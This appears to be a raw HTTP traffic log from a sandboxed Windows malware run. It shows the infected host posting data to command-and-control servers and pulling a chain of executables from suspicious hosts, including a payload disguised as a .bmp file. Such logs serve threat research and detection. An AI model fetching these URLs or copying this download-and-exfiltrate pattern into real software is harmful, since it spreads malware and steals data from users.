HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:06:49 GMT Date: Fri, 05 Nov 2021 00:06:49 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:06:49 GMT Date: Fri, 05 Nov 2021 00:06:49 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:06:49 GMT Date: Fri, 05 Nov 2021 00:06:49 GMT Connection: keep-alive

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 180 Expect: 100-continue Accept-Encoding: gzip Connection: Keep-Alive

HTTP/1.1 100 Continue

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

GET /server.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: 45.133.1.107

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:10 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT ETag: "13-5cff5b943f0c1" Accept-Ranges: bytes Content-Length: 19 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain

GET /server.txt HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: 45.133.1.107

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:10 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT ETag: "13-5cff5b943f0c1" Accept-Ranges: bytes Content-Length: 19 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain

GET /base/api/statistics.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:11 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 94 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /base/api/statistics.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:11 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 94 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 2033 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:12 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 2033 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:12 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:13 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 108 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:13 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 108 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/NiceProcessX64.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.107 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:13 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT ETag: "4fa00-5cbb9fe84ddf3" Accept-Ranges: bytes Content-Length: 326144 Content-Type: image/x-ms-bmp

HEAD /download/NiceProcessX64.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.107 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT ETag: "4fa00-5cbb9fe84ddf3" Accept-Ranges: bytes Content-Length: 326144 Content-Type: image/x-ms-bmp

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:13 GMT Date: Fri, 05 Nov 2021 00:07:13 GMT Connection: keep-alive

GET /download/NiceProcessX64.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.107 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT ETag: "4fa00-5cbb9fe84ddf3" Accept-Ranges: bytes Content-Length: 326144 Content-Type: image/x-ms-bmp

GET /download/NiceProcessX64.bmp HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.133.1.107 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT ETag: "4fa00-5cbb9fe84ddf3" Accept-Ranges: bytes Content-Length: 326144 Content-Type: image/x-ms-bmp

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip,gzip Host: requestimedout.com Content-Length: 264 Expect: 100-continue

HTTP/1.1 100 Continue

GET /lqosko/p18j/cust51.exe HTTP/1.1 Host: file.ekkggr3.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:16 GMT Content-Type: application/octet-stream Content-Length: 1413632 Connection: keep-alive last-modified: Thu, 21 Oct 2021 09:59:41 GMT etag: "61713a0d-159200" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2665 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rm%2BCLOZvJErjZPFFIPO1m3NTaPYIhBRjhZUVik1b5KV4f0RqwKIMP27Fcv6%2FEslP8Wvyy27qKSOz3OU6C3wPjaiEoIkoz1vgIHVMO8MxCD7CpKfZsWLdKAH52FWJ1HbnUPv1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d74638e8fccd-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:16 GMT Date: Fri, 05 Nov 2021 00:07:16 GMT Connection: keep-alive

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:17 GMT Date: Fri, 05 Nov 2021 00:07:17 GMT Connection: keep-alive

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 224 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

GET /json/ HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 viewport-width: 1920 Host: ip-api.com

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:17 GMT Content-Type: application/json; charset=utf-8 Content-Length: 276 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44

GET /pub.php?pub=five HTTP/1.1 Host: 45.9.20.156 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:18 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Description: File Transfer Content-Disposition: attachment; filename=setup.exe Content-Transfer-Encoding: binary Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:18 GMT Date: Fri, 05 Nov 2021 00:07:18 GMT Connection: keep-alive

GET /api/fbtime HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 Host: staticimg.youtuuee.com

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.21

POST /api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60 Content-Length: 289 Host: staticimg.youtuuee.com

HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Nov 2021 00:07:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/7.4.21

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:19 GMT Date: Fri, 05 Nov 2021 00:07:19 GMT Connection: keep-alive

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

GET /campaign2/autosubplayer.exe HTTP/1.1 Host: cloutingservicedb.su Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:20 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: keep-alive x-powered-by: PHP/7.4.25 vary: Accept-Encoding x-turbo-charged-by: LiteSpeed Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2825 Last-Modified: Thu, 04 Nov 2021 23:20:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cDtFisfT7WinEelXkS8cJDAO61%2FuA4%2B5AScL5WMdlYMY7yJEoq9Dd4naswqWJM%2B7ID8X0JjWNatzwNMwh1Kl3Fof3zukV1Tn%2FE1erBJTEyun6h%2BhRkLsDqjIJc1urf4x59mZEAEhTg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6a91d762cc5a0a66-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:20 GMT Date: Fri, 05 Nov 2021 00:07:20 GMT Connection: keep-alive

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:21 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 4800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /base/api/getData.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 212.192.241.15

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:21 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 X-Powered-By: PHP/7.3.28 Content-Length: 4800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

POST /xenocrates/zoroaster HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: requestimedout.com Content-Length: 264 Expect: 100-continue Accept-Encoding: gzip

HTTP/1.1 100 Continue

HEAD /udptest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.56.146.36 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: application/x-msdos-program Content-Length: 462336 Connection: keep-alive Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT ETag: "70e00-5cfff534e3a12" Accept-Ranges: bytes

HEAD /udptest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.56.146.36 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: application/x-msdos-program Content-Length: 462336 Connection: keep-alive Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT ETag: "70e00-5cfff534e3a12" Accept-Ranges: bytes

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT ETag: "37d-5cf84cd446e80" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 05 Nov 2021 01:07:22 GMT Date: Fri, 05 Nov 2021 00:07:22 GMT Connection: keep-alive

GET /udptest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.56.146.36 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: application/x-msdos-program Content-Length: 462336 Connection: keep-alive Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT ETag: "70e00-5cfff534e3a12" Accept-Ranges: bytes

GET /udptest.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 193.56.146.36 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 05 Nov 2021 00:07:22 GMT Content-Type: application/x-msdos-program Content-Length: 462336 Connection: keep-alive Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT ETag: "70e00-5cfff534e3a12" Accept-Ranges: bytes

HEAD /askhelp42/askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.hzradiant.com/askinstall42.exe

HEAD /askhelp42/askinstall42.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.hzradiant.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.hzradiant.com/askinstall42.exe

HEAD /askhelp59/askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.mrwenshen.com/askinstall59.exe

HEAD /search_hyperfs_204.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dataonestorage.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://dataonestorage.com/search_hyperfs_204.exe

HEAD /search_hyperfs_204.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: dataonestorage.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 301 Moved Permanently Server: nginx/1.20.1 Date: Fri, 05 Nov 2021 00:07:23 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://dataonestorage.com/search_hyperfs_204.exe

HEAD /downloads/toolspab2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: privacytoolzfor-you6000.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT ETag: "55a00-5cfff6c24c825" Accept-Ranges: bytes Content-Length: 350720 Connection: close Content-Type: application/octet-stream

HEAD /pub33.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: eguntong.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT ETag: "55c00-5cfff19f5bd79" Accept-Ranges: bytes Content-Length: 351232 Connection: close Content-Type: application/x-msdos-program

HEAD /pub33.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: eguntong.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 04 Nov 2021 23:44:02 GMT ETag: "55c00-5cfff19f5bd79" Accept-Ranges: bytes Content-Length: 351232 Connection: close Content-Type: application/x-msdos-program

HEAD /askhelp59/askinstall59.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.mrwenshen.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 302 Found Server: nginx Date: Fri, 05 Nov 2021 00:06:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40 Location: http://www.mrwenshen.com/askinstall59.exe

HEAD /downloads/toolspab2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: privacytoolzfor-you6000.top Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:07:23 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38 Last-Modified: Fri, 05 Nov 2021 00:07:01 GMT ETag: "55a00-5cfff6c24c825" Accept-Ranges: bytes Content-Length: 350720 Connection: close Content-Type: application/octet-stream

